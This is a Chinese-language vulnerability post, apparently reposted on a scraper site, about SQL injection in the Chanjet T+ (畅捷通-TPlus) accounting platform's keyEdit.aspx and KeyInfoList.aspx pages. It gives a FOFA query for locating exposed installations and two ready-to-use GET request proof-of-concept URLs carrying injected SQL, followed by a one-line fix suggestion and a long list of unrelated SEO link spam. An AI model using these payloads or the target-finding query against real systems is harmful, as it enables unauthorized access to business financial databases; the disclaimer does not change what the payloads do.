当前位置: 首页 > news >正文

怎么做网站超链接seo推荐

怎么做网站超链接,seo推荐,id创建网站,网络推广网站前言 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、产…

前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、产品简介

畅捷通-TPlus是一个为中小企业设计的财税云服务平台,提供财务、税务管理和发票处理功能,支持低代码开发,帮助企业实现数字化和智能化经营管理。

二、漏洞描述

该系统的keyEdit.aspx、KeyInfoList.aspx接口存在sql注入漏洞

三、影响范围

未知

四、复现环境

FOFA:

app="畅捷通-TPlus"

五、漏洞复现

1.访问存在漏洞的网站
在这里插入图片描述

2.直接以GET方式请求

POC1:

http://127.0.0.1/tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','1')))--+

POC2

http://127.0.0.1/tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%27123456%27)))%20--&preload=1

3.成功
在这里插入图片描述
在这里插入图片描述

六、修复建议

关闭互联网暴露面访问的权限,及时更新系统


参考链接

https://blog.csdn.net/ahhacker86/article/details/138482856
https://blog.csdn.net/wan___she__pi/article/details/137461590


http://www.hengruixuexiao.com/news/15512.html

相关文章:

  • 成都怎么成立网站免费网上申请注册
  • 电视台网站模版seo网站内部优化方案
  • 仿做静态网站多少钱湖南知名网络推广公司
  • 成品网站管理系统2024年重大新闻简短
  • 三大门户网站是什么seo优化外链平台
  • 网站首页滚动图片百度广告代理商加盟
  • 模板网站官网公司官网搭建
  • 有了域名之后怎么做网站营销策略有哪些内容
  • 做擦边网站 服务器放在狗爹东莞seo顾问
  • 无锡网站策划公司win7优化
  • 广东网站建设开发怎样制作一个网页
  • 发票 网站建设 单位网站制作策划书
  • app开发 上传wordpress兰州seo
  • 初创企业网站建设流程最近发生的新闻
  • 中国建设人才服务信息网是不是正规网站整站优化包年
  • hexo和wordpress网站seo入门基础教程
  • 宁波建设网图百度搜索引擎优化公司哪家强
  • 企业网站开发公司-北京公司网络营销专业
  • 电商网站开发需求文档个人发布信息免费推广平台
  • wordpress建站安全性手游推广渠道和推广方式
  • wordpress 数据交互国外搜索引擎优化
  • 制作简单的个人网站如何制作网站赚钱
  • b2b b2c 平台网站建设方案大连seo顾问
  • 可以做ppt的网站有哪些方面广州的百度推广公司
  • 哔哩哔哩官方网站首页深圳推广系统
  • 哪些网站是.net开发的湖南网站设计
  • 房产网站流量排名视频app推广
  • 西安做网站哪里价格低直接进网站的浏览器
  • 沈阳网站托管公司南召seo快速排名价格
  • 山东泰安泰山区疫情佛山做网络优化的公司